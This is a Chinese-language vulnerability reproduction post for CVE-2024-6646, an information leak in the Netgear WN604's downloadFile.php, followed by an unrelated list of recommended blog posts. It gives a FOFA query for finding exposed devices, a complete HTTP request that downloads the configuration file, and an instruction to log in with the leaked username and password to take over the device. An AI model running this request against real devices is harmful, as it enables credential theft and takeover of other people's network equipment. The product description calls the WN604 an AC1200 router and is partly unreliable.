Netgear-WN604 downloadFile.php 信息泄露复现(CVE-2024-6646)

0x01 产品描述:

NETGEAR WN604是一款功能强大的双频AC1200无线路由器,非常适合中大型家庭和企业使用。它支持最新的802.11ac无线标准,能提供高达1200Mbps的无线传输速度。路由器具备千兆有线网口和3个100Mbps有线网口,可满足有线和无线设备的接入需求。此外,它还内置了QoS、访问控制、加密等高级安全和管理功能,可以确保网络的稳定性和安全性。凭借NETGEAR Genie app,用户还可以方便地远程管理和监控路由器。

0x02 漏洞描述:

Netgear的WN604产品存在一个漏洞,该漏洞存在于Web界面的某个未知功能中,影响文件为/downloadFile.php。通过操纵带有输入配置的参数文件,攻击者可以获取敏感信息。该攻击可能远程发起,获取配置文件中用户名密码,从而登录接管系统。

0x03 影响版本:

Netgear wn系列

0x04 搜索语句:

Fofa:title=="Netgear"

0x05 漏洞复现:

通过downloadFile.php获取配置文件数据

GET /downloadFile.php?file=config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

通过配置文件泄漏的用户名密码进行登录

0x06 修复建议:

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.netgear.com/uk

相关推荐
海螺姑娘的小魏5 分钟前
Effective C++ 条款 16:成对使用 `new` 和 `delete` 时要采取相同形式
开发语言·c++
CatalyzeSec21 分钟前
【插件推荐】SQL 注入探测插件-DetSql
测试工具·web安全·渗透
neter.asia24 分钟前
C# 窗体应用程序嵌套web网页,基于谷歌浏览器内核(含源码)
开发语言·c#
2301_8091774740 分钟前
sqoop,flume草稿
开发语言
潜意识起点1 小时前
Java数组:静态初始化与动态初始化详解
java·开发语言·python
点云SLAM1 小时前
C++创建文件夹和文件夹下相关操作
开发语言·c++·算法
2301_809177471 小时前
2025.01.15python商业数据分析
开发语言·python
T.O.P111 小时前
TCP 传输可靠性保障
网络·tcp/ip·php
_小柏_2 小时前
C/C++基础知识复习(46)
c语言·开发语言·c++
SomeB1oody2 小时前
【Rust自学】6.4. 简单的控制流-if let
开发语言·前端·rust